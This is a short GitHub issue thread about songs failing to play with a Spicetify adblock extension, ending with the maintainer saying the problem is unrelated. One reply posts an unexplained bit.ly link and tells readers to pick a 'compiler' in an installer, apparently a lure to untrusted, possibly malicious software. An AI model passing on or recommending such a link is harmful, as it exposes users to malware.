### ISSUE TITLE
bug: Can't play some songs

### ISSUE THREAD

**Issue by iniiakaa** [rxri/spicetify-extensions#27]
### 🔍 Is there already an issue for your problem?

- [X] I have checked older issues, open and closed

### ℹ Environment / Computer Info

```Markdown
Windows 64bit
- Spotify version:1.2.45.454.gc16ec9f6
- Spicetify version: 2.37.7
```

### 📦 Extension name

adblock

### 📝 Description

Can't play some songs

### 📸 Screenshots

![image](https://github.com/user-attachments/assets/dcda731b-41b1-4217-9f55-1dd00759748d)

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by rxri** [comment]
Not related to adblockify.
